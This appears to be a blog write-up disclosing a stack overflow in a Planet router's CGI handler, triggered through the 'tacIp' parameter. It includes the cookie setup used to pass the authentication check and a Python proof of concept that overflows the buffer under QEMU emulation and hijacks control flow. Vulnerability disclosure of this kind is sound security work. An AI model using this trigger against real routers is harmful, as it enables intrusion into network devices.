web_tacplus_serverEdit_post_tacIp

web_tacplus_serverEdit_post_tacIp

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the Planet router.

By analyzing the dispatcher file in the bin directory, I found that the function web_tacplus_serverEdit_post contains a stack overflow vulnerability.

The stack overflow can be triggered by tacIp value, which leads to a memcpy stack overflow.

image-20250321152223389

In the main function, there is an account authentication detection. We create a cookie_0 in the tmp directory, with the content of “20 0 0”, and its function is to create a cookie with sufficient permissions to access this route.

1
20 0 0

image-20250417141216622

image-20250417110648157

The content of the poc.py file is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import os


a =8196
var_name = "tacIp"
b = 'a' * 0x600
c = "tacIdx=111111"

poc_content = f"&cmd={a}&{var_name}={b}&{c}"
with open('poc', 'w') as f:
    f.write(poc_content)

command = (
    "sudo chroot . ./qemu-mips-static "
    "-E REQUEST_METHOD=POST "
    "-E HTTP_COOKIE='hid=0' "
    "-L ./lib "
    "-g 1234 "
    "./dispatcher.cgi "
    "< poc"  
)


os.system(command)




Attack result

image-20250417110813345

image-20250417142109298

通过上述截图可以看到我们已经溢出到了0x1e8,并且劫持了程序控制流,如果需要的话可以溢出更多

#cve
web_tacplus_serverEdit_post_tacIp
https://lafdrew.github.io/2025/04/20/web-tacplus-serverEdit-post-tacIp/
Author
John Doe
Posted on
April 20, 2025
Licensed under